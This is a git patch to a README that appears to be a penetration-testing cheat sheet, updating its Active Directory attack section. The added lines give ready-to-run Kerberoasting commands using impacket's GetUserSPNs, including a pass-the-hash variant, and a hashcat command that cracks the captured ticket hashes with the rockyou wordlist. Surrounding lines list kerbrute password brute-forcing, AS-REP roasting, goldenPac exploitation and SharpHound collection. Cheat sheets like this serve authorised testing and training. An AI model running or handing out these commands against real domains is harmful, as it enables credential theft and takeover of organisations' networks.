From a7f279cf6d1c868aa0c3712f2544b643437d0863 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 4 Oct 2022 15:15:08 -0400
Subject: [PATCH] Update README.md

---
 README.md | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index d3e5bc7..31fb220 100644
--- a/README.md
+++ b/README.md
@@ -706,8 +706,11 @@ sudo /opt/kerbrute/kerbrute bruteuser -d {DOMAIN} --dc {IP ADDRESS} /usr/share/w
 # Get active directory users
 python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
 
-# Get user SPN
-python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
+# Kerberoast - Get user SPN
+python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS} -outputfile hashes.kerberoast
+python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -hashes {HASH}:{HASH} {DOMAIN}/{USERNAME} -dc-ip {DC IP} -outputfile hashes.kerberoast
+
+hashcat -m 13100 {HASH} /usr/share/wordlists/rockyou.txt -O --force
 
 # ASREP ROAST
 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john
@@ -721,7 +724,6 @@ python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME}:{
 # Kerberos PAC enabled
 python3 /usr/share/doc/python3-impacket/examples/goldenPac.py {DOMAIN}/{USER}@{FULL DOMAIN} -dc-ip {IP ADDRESS} -target-ip {IP ADDRESS}
 
-
 # Bloodhound
 sudo neo4j console                          # LHOST
 ./SharpHound.exe -c all                     # RHOST